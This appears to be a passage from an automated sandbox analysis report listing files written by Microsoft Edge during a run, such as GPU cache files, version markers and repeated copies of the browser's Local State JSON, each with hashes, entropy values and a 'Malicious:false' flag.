                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_2

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNl6Cj:Ls36Cj
                                                                                                                                                            MD5:20AF659AFA1589D03A9D83A70C9C90C7
                                                                                                                                                            SHA1:95925495DB7E405598175C1F53E2A0B4B1962461
                                                                                                                                                            SHA-256:443C568D3FEFBEA234B6FE947C0F465A5A9805E46724C5BE9316B9E1333A09F9
                                                                                                                                                            SHA-512:0A71E5E94C6B4151A0C15B3A3661CEA3D7AE99EB8F5F20E85FE225ED93B9D7E82C2D401CCA1DDA5B5A2221BD478F0EB3F244A3EEB6BC3B13E6616C61F1A31C89
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..........................................Y.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):120
                                                                                                                                                            Entropy (8bit):3.32524464792714
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                            MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                            SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                            SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                            SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13
                                                                                                                                                            Entropy (8bit):2.7192945256669794
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                            MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                            SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                            SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                            SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:117.0.2045.47

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36dde.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF37178.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF37243.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF37253.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39934.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b24a.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b288.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b298.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3d255.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
